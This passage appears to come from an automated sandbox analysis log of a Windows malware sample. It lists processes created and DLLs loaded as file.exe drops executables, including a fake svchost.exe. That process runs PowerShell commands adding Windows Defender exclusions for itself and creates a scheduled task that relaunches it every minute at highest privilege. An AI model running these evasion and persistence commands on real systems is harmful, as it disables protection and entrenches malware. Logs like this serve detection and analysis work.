                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Roaming\All function.exe "C:\Users\user\AppData\Roaming\All function.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess created: C:\Users\user\AppData\Roaming\ALL slumzick.exe "C:\Users\user\AppData\Roaming\ALL slumzick.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ALL slumzick.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ALL slumzick.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ALL slumzick.exeSection loaded: d3dcompiler_43.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ALL slumzick.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ALL slumzick.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ALL slumzick.exeSection loaded: d3dx11_43.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ALL slumzick.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ALL slumzick.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ALL slumzick.exeSection loaded: vcruntime140_1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ALL slumzick.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ALL slumzick.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ALL slumzick.exeSection loaded: vcruntime140_1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ALL slumzick.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
